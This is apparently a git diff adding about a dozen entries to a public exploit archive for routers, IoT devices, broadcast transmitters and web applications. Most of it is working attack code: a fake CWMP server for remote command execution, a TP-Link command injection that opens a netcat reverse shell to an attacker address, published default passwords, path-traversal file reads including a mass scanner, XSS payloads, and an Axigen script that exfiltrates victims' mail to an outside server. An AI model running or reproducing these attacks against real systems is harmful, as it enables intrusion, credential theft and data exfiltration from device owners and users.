diff --git a/exploits/hardware/remote/51642.py b/exploits/hardware/remote/51642.py new file mode 100755 index 0000000000..0668cacb00 --- /dev/null +++ b/exploits/hardware/remote/51642.py @@ -0,0 +1,176 @@ +# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) +# Google Dork: None +# Date: July 31, 2023 +# Exploit Author: Riyan Firmansyah of Seclab +# Vendor Homepage: https://ruijienetworks.com +# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 +# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) +# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO +# CVE : None + +""" +Summary +======= +The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. +In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. +Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. +Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. +""" + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from html import escape, unescape +import http.server +import socketserver +import io +import time +import re +import argparse +import gzip + +# command payload +command = "uname -a" + +# change this to serve on a different port +PORT = 8080 + +def cwmp_inform(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + product_class = re.search(r"(?:)(.*?)(?:<\/ProductClass>)", soap).group(1) + serial_number = re.search(r"(?:)(.*?)(?:<\/SerialNumber>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} + parameters = re.findall(r"(?:

)(.*?)(?:<\/P>)", soap) + for parameter in parameters: + parameter_name = re.search(r"(?:)(.*?)(?:<\/N>)", parameter).group(1) + parameter_value = re.search(r"(?:)(.*?)(?:<\/V>)", parameter).group(1) + result['parameters'][parameter_name] = parameter_value + return result + +def cwmp_inform_response(): + return """ +1611""" + +def command_payload(command): + current_time = time.time() + result = """ +ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}1config{command}""".format(cur_time=current_time, command=command) + return result + +def command_response(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + command = re.search(r"(?:)(.*?)(?:<\/Command>)", soap).group(1) + response = re.search(r"(?:)((\n|.)*?)(?:<\/Response>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} + return result + +class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): + protocol_version = 'HTTP/1.1' + def do_GET(self): + self.send_response(204) + self.end_headers() + + def do_POST(self): + print("[*] Got hit by", self.client_address) + + f = io.BytesIO() + if 'service' in self.path: + stage, info = self.parse_stage() + if stage == "cwmp_inform": + self.send_response(200) + print("[!] Got Device information", self.client_address) + print("[*] Product Class:", info['product_class']) + print("[*] Serial Number:", info['serial_number']) + print("[*] MAC Address:", info['parameters']['mac']) + print("[*] STUN Client IP:", info['parameters']['stunclientip']) + payload = bytes(cwmp_inform_response(), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + elif stage == "command_request": + self.send_response(200) + self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") + print("[*] Device interacting", self.client_address) + print(info) + payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + else: + print("[*] Command response", self.client_address) + print(unescape(info['response'])) + self.send_response(204) + f.write(b"") + else: + print("[x] Received invalid request", self.client_address) + self.send_response(204) + f.write(b"") + + f.seek(0) + self.send_header("Connection", "keep-alive") + self.send_header("Content-type", "text/xml;charset=utf-8") + self.end_headers() + if f: + self.copyfile(f, self.wfile) + f.close() + + def parse_stage(self): + content_length = int(self.headers['Content-Length']) + post_data = gzip.decompress(self.rfile.read(content_length)) + if "cwmp:Inform" in post_data.decode("utf-8"): + return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) + elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): + return ("command_response", command_response(post_data.decode("utf-8"))) + else: + return ("command_request", "Ping!") + + def log_message(self, format, *args): + return + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', + help='Specify alternate bind address ' + '[default: all interfaces]') + parser.add_argument('port', action='store', + default=PORT, type=int, + nargs='?', + help='Specify alternate port [default: {}]'.format(PORT)) + args = parser.parse_args() + + Handler = CustomHTTPRequestHandler + with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: + ip_addr = args.bind if args.bind != '' else '0.0.0.0' + print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) + try: + httpd.serve_forever() + except KeyboardInterrupt: + pass + httpd.server_close() + + +""" +Output +====== +ubuntu:~$ python3 exploit.py +[!] serving fake CWMP server at 0.0.0.0:8080 +[*] Got hit by ('[redacted]', [redacted]) +[!] Got Device information ('[redacted]', [redacted]) +[*] Product Class: EW1200G-PRO +[*] Serial Number: [redacted] +[*] MAC Address: [redacted] +[*] STUN Client IP: [redacted]:[redacted] +[*] Got hit by ('[redacted]', [redacted]) +[*] Device interacting ('[redacted]', [redacted]) +Ping! +[*] Got hit by ('[redacted]', [redacted]) +[*] Command response ('[redacted]', [redacted]) +PING 127.0.0.1 (127.0.0.1): 56 data bytes +64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms +64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms + +--- 127.0.0.1 ping statistics --- +4 packets transmitted, 4 packets received, 0% packet loss +round-trip min/avg/max = 0.300/0.335/0.400 ms +Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux + +""" \ No newline at end of file diff --git a/exploits/hardware/remote/51657.txt b/exploits/hardware/remote/51657.txt new file mode 100644 index 0000000000..e5c64fa352 --- /dev/null +++ b/exploits/hardware/remote/51657.txt @@ -0,0 +1,68 @@ +#!/bin/bash + +# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass +# Google Dork: NA +# Date: 2nd August 2023 +# Exploit Author: The Security Team [exploitsecurity.io] +# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability +# Vendor Homepage: https://www.shelly.com/ +# Software Link: NA +# Version: Firmware v0.11.0 (REQUIRED) +# Tested on: MacOS/Linux +# CVE : CVE-2023-33383 + +IFS= +failed=$false +RED="\e[31m" +GREEN="\e[92m" +WHITE="\e[97m" +ENDCOLOR="\e[0m" +substring="Connection refused" + + +banner() + { + clear + echo -e "${GREEN}[+]*********************************************************[+]" + echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" + echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" + echo -e "${GREEN}| CVE: CVE-2023-33383 |" + echo -e "${GREEN}[+]*********************************************************[+]" + echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" + } + +banner +read -s -n 1 key +if [ "$key" = "x" ]; then + exit 0; +elif [ "$key" = "" ]; then + gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) + if [ -z "$gattout" ]; then + echo -e "${RED}Connection timed out${ENDCOLOR}" + exit 0; + else + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 + echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" + sleep 1 + if [ $? -eq 1 ]; then + $failed=$true + exit 0; + fi + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 + sleep 1 + if [ $? -eq 1 ]; then + $failed=$true + echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" + exit 0; + else + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 + sleep 1 + for i in {1..5} + do + echo -ne "${GREEN}." + sleep 1 + done + echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" + fi +fi +fi \ No newline at end of file diff --git a/exploits/hardware/remote/51677.py b/exploits/hardware/remote/51677.py new file mode 100755 index 0000000000..553ce53e0f --- /dev/null +++ b/exploits/hardware/remote/51677.py @@ -0,0 +1,52 @@ +#!/usr/bin/python3 +# +# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection +# Date: 07/25/2023 +# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security) +# Vendor Homepage: https://www.tp-link.com/us/ +# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389) +# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0 +# CVE: CVE-2023-1389 +# +# Disclaimer: This script is intended to be used for educational purposes only. +# Do not run this against any system that you do not have permission to test. +# The author will not be held responsible for any use or damage caused by this +# program. +# +# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web +# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the +# *country* parameter of the *write* callback for the *country* form at the +# "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is +# possible to run commands as root. Execution requires sending the request twice; +# the first request sets the command in the *country* value, and the second request +# (which can be identical or not) executes it. +# +# This script is a short proof of concept to obtain a reverse shell. To read more +# about the development of this script, you can read the blog post here: +# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94 +# Before running the script, start a nc listener on your preferred port -> run the script -> profit + +import requests, urllib.parse, argparse +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# Suppress warning for connecting to a router with a self-signed certificate +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# Take user input for the router IP, and attacker IP and port +parser = argparse.ArgumentParser() + +parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name") +parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP") +parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port") + +args = parser.parse_args() + +# Generate the reverse shell command with the attacker IP and port +revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f") + +# URL to obtain the reverse shell +url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")" + +# Send the URL twice to run the command. Sending twice is necessary for the attack +r = requests.get(url_command, verify=False) +r = requests.get(url_command, verify=False) \ No newline at end of file diff --git a/exploits/hardware/remote/51684.txt b/exploits/hardware/remote/51684.txt new file mode 100644 index 0000000000..b985059ba3 --- /dev/null +++ b/exploits/hardware/remote/51684.txt @@ -0,0 +1,43 @@ +#Exploit Title: EuroTel ETL3100 Transmitter Default Credentials +# Exploit Author: LiquidWorm +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The TV and FM transmitter uses a weak set of default administrative +credentials that can be guessed in remote password attacks and gain full +control of the system. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5782 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php + + +29.04.2023 + +-- + + +Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode. +Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages. \ No newline at end of file diff --git a/exploits/hardware/remote/51685.txt b/exploits/hardware/remote/51685.txt new file mode 100644 index 0000000000..220ae747cf --- /dev/null +++ b/exploits/hardware/remote/51685.txt @@ -0,0 +1,54 @@ +# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) +# Exploit Author: LiquidWorm + +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The application is vulnerable to insecure direct object references +that occur when the application provides direct access to objects based +on user-supplied input. As a result of this vulnerability attackers can +bypass authorization and access the hidden resources on the system and +execute privileged functionalities. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5783 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php + + +29.04.2023 + +-- + + +See URL: + +TARGET/exciter.php?page=0 +TARGET/exciter.php?page=1 +TARGET/exciter.php?page=2 +... +... +TARGET/exciter.php?page=29 +TARGET/exciter.php?page=30 +TARGET/exciter.php?page=31 \ No newline at end of file diff --git a/exploits/hardware/remote/51686.txt b/exploits/hardware/remote/51686.txt new file mode 100644 index 0000000000..1d161c7b6d --- /dev/null +++ b/exploits/hardware/remote/51686.txt @@ -0,0 +1,45 @@ +# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download +# Exploit Author: LiquidWorm + +Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L +Product web page: https://www.eurotel.it | https://www.siel.fm +Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) + v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) + + +Summary: RF Technology For Television Broadcasting Applications. +The Series ETL3100 Radio Transmitter provides all the necessary +features defined by the FM and DAB standards. Two bands are provided +to easily complain with analog and digital DAB standard. The Series +ETL3100 Television Transmitter provides all the necessary features +defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as +well as the analog TV standards. Three band are provided to easily +complain with all standard channels, and switch softly from analog-TV +'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. + +Desc: The TV and FM transmitter suffers from an unauthenticated +configuration and log download vulnerability. This will enable +the attacker to disclose sensitive information and help him in +authentication bypass, privilege escalation and full system access. + +Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) + lighttpd/1.4.26 + PHP/5.4.3 + Xilinx Virtex Machine + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5784 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php + + +29.04.2023 + +-- + + +$ curl http://192.168.2.166/cfg_download.php -o config.tgz +$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/51720.py b/exploits/hardware/remote/51720.py new file mode 100755 index 0000000000..ee4a2e6d95 --- /dev/null +++ b/exploits/hardware/remote/51720.py @@ -0,0 +1,77 @@ +# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities +# Google Dork: N/A +# Date: 25/08/2023 +# Exploit Author: The Security Team [exploitsecurity.io] +# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570 +# Software Link: N/A +# Version: 1.0.19_T53 +# Tested on: MACOS/Linux +# CVE : CVE-2023-34723 +# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725 + +#!/opt/homebrew/bin/python3 + +import requests +import sys +from time import sleep +from urllib3.exceptions import InsecureRequestWarning +from colorama import init +from colorama import Fore, Back, Style +import re +import os +import ipaddress +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +def banner(): + if os.name == 'posix': + clr_cmd = ('clear') + elif os.name == 'nt': + clr_cmd = ('cls') + os.system(clr_cmd) + print ("[+]****************************************************[+]") + print (" | Author : The Security Team |") + print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|") + print (" | Description : TechVIEW LA-5570 Directory Traversal |") + print (" | Usage : "+sys.argv[0]+" |") + print ("[+]****************************************************[+]") + +def usage(): + print (f"Usage: {sys.argv[0]} ") + +def main(target): + domain = "http://"+target+"/config/system.conf" + try: + url = domain.strip() + r = requests.get(url, verify=False, timeout=3) + print ("[+] Retrieving credentials", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + sleep(1) + print(" .", flush=True, end='') + if ("system_password" in r.text): + data = (r.text.split("\n")) + print (f"\n{data[1]}") + else: + print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL) + except TimeoutError: + print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) + except KeyboardInterrupt: + return + except requests.exceptions.Timeout: + print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL) + return + +if __name__ == '__main__': + if len(sys.argv)>1: + banner() + target = sys.argv[1] + try: + validate = ipaddress.ip_address(target) + if (validate): + main (target) + except ValueError as e: + print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) + else: + print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL) \ No newline at end of file diff --git a/exploits/hardware/webapps/51709.txt b/exploits/hardware/webapps/51709.txt new file mode 100644 index 0000000000..7e48513992 --- /dev/null +++ b/exploits/hardware/webapps/51709.txt @@ -0,0 +1,18 @@ +# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information +# Date : 25-08-2023 +# Exploit Author : tahaafarooq +# Vendor Homepage : https://dlink.com/ +# Version : FRU2.2.15.8 +# Tested on: DLINK DPH-400SE (VoIP Phone) + +Description: + +With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200 + +POC : + +1. Login with the default guest credentials "guest:guest" +2. Access the Maintenance tab. +3. Under the maintenance tab, access the "Access" feature +4. On "Account Option" choose a user to modify, thus "Admin" and click modify. +5. Right click on the password, and click reveal, the password is then seen in plaintext. \ No newline at end of file diff --git a/exploits/linux/local/51674.txt b/exploits/linux/local/51674.txt new file mode 100644 index 0000000000..e13f70eeee --- /dev/null +++ b/exploits/linux/local/51674.txt @@ -0,0 +1,17 @@ +# Exploit Title: systemd 246 - Local Privilege Escalation +# Exploit Author: Iyaad Luqman K (init_6) +# Application: systemd 246 +# Tested on: Ubuntu 22.04 +# CVE: CVE-2023-26604 + +systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. +This vulnerability allows a local attacker to gain root privileges. + +## Proof Of Concept: +1. Run the systemctl command which can be run as root user. + +sudo /usr/bin/systemctl status any_service + +2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands. + +3. Type in `!/bin/sh` in the pager to spawn a shell as root user. \ No newline at end of file diff --git a/exploits/multiple/webapps/51646.txt b/exploits/multiple/webapps/51646.txt new file mode 100644 index 0000000000..aeff179a5f --- /dev/null +++ b/exploits/multiple/webapps/51646.txt @@ -0,0 +1,19 @@ +# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) +# Date: 01.08.2023 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://ozeki-sms-gateway.com +# Software Link: +https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip +# Version: 10.3.208 +# Tested on: Windows 10 + + + +##################################### Arbitrary File Read PoC +##################################### + +curl +https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini + +##################################### Arbitrary File Read PoC +##################################### \ No newline at end of file diff --git a/exploits/multiple/webapps/51668.txt b/exploits/multiple/webapps/51668.txt new file mode 100644 index 0000000000..ed649f926b --- /dev/null +++ b/exploits/multiple/webapps/51668.txt @@ -0,0 +1,39 @@ +# Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS +# Google Dork: NA +# Date: 05/08/2023 +# Exploit Author: Yehia Elghaly +# Vendor Homepage: https://www.lucee.org/ +# Software Link: https://download.lucee.org/ +# Version: << 5.4.2.17 +# Tested on: Windows 10 +# CVE: N/A + + +Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java. + +Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + +The payload: ?msg= +http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E + +POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1 +Host: 172.16.110.130:8888 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +Origin: http://172.16.110.130:8888 +Connection: close +Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create +Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview +Upgrade-Insecure-Requests: 1 + +name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit + +[Affected Component] +Debugging-->Template +Service --> Search +Services --> Event Gateway +Service --> Logging \ No newline at end of file diff --git a/exploits/multiple/webapps/51708.py b/exploits/multiple/webapps/51708.py new file mode 100755 index 0000000000..c6b646ff08 --- /dev/null +++ b/exploits/multiple/webapps/51708.py @@ -0,0 +1,39 @@ +# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion +# Date: 8/22/2023 +# Exploit Author: Bryce "Raindayzz" Harty +# Vendor Homepage: https://www.filemage.io/ +# Version: Azure Versions < 1.10.9 +# Tested on: All Azure deployments < 1.10.9 +# CVE : CVE-2023-39026 + +# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html +# Patch from vendor - https://www.filemage.io/docs/updates.html + +import requests +import warnings +warnings.filterwarnings("ignore") +def worker(url): + response = requests.get(url, verify=False, timeout=.5) + return response +def main(): + listIP = [] + file_path = input("Enter the path to the file containing the IP addresses: ") + with open(file_path, 'r') as file: + ip_list = file.read().splitlines() + searchString = "tls" + for ip in ip_list: + url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml" + try: + response = worker(url) + #print(response.text) + if searchString in response.text: + print("Vulnerable IP: " + ip) + print(response.text) + listIP.append(ip) + except requests.exceptions.RequestException as e: + print(f"Error occurred for {ip}: {str(e)}") + + for x in listIP: + print(x) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/51722.txt b/exploits/multiple/webapps/51722.txt new file mode 100644 index 0000000000..4fe0cbfa82 --- /dev/null +++ b/exploits/multiple/webapps/51722.txt @@ -0,0 +1,80 @@ +# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS +# Google Dork: inurl:passwordexpired=yes +# Date: 2023-08-21 +# Exploit Author: AmirZargham +# Vendor Homepage: https://www.axigen.com/ +# Software Link: https://www.axigen.com/mail-server/download/ +# Version: (10.5.0–4370c946) and older version of Axigen WebMail +# Tested on: firefox,chrome +# CVE: CVE-2022-31470 + +Exploit +We use the second Reflected XSS to exploit this vulnerability, create a +malicious link, and steal user emails. + +Dropper code +This dropper code, loads and executes JavaScript exploit code from a remote +server. + +'); +x = document.createElement('script'); +x.src = 'https://example.com/exploit.js'; +window.addEventListener('DOMContentLoaded',function y(){ + document.body.appendChild(x) +})// + + + +Encoded form + +/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 +https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})// + + +Exploit code + +xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new +XMLHttpRequest(); +oob_server = 'https://example.com/'; +var script_tag = document.createElement('script'); + +xhr1.open('GET', '/', true); +xhr1.onreadystatechange = () => { + if (xhr1.readyState === XMLHttpRequest.DONE) { + _h_cookie = new URL(xhr1.responseURL).search.split("=")[1]; + xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`, +true); + xhr2.setRequestHeader('Content-Type', 'application/json'); + xhr2.onreadystatechange = () => { + if (xhr2.readyState === XMLHttpRequest.DONE) { + if (xhr2.status === 401){ + script_tag.src = +`${oob_server}?status=session_expired&domain=${document.domain}`; + document.body.appendChild(script_tag); + } else { + resp = xhr2.responseText; + folderId = JSON.parse(resp)["mails"][0]["folderId"]; + xhr3.open('GET', +`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true); + xhr3.onreadystatechange = () => { + if (xhr3.readyState === XMLHttpRequest.DONE) { + emails = xhr3.responseText; + script_tag.src = +`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`; + document.body.appendChild(script_tag); + } + }; + xhr3.send(); + } + } + }; + var body = JSON.stringify({isUnread: false}); + xhr2.send(body); + } +}; +xhr1.send(); + + +Combining dropper and exploit +You can host the exploit code somewhere and then address it in the dropper +code. \ No newline at end of file diff --git a/exploits/php/webapps/51638.txt b/exploits/php/webapps/51638.txt new file mode 100644 index 0000000000..685ed70357 --- /dev/null +++ b/exploits/php/webapps/51638.txt @@ -0,0 +1,56 @@ +# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 28/07/2023 +# Vendor: Solidres Team +# Vendor Homepage: http://solidres.com/ +# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/ +# Demo: http://demo.solidres.com/joomla +# Version: 2.13.3 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +GET parameter 'show' is vulnerable to XSS +GET parameter 'reviews' is vulnerable to XSS +GET parameter 'type_id' is vulnerable to XSS +GET parameter 'distance' is vulnerable to XSS +GET parameter 'facilities' is vulnerable to XSS +GET parameter 'categories' is vulnerable to XSS +GET parameter 'prices' is vulnerable to XSS +GET parameter 'location' is vulnerable to XSS +GET parameter 'Itemid' is vulnerable to XSS + + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS] + +https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18& + +https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS] + 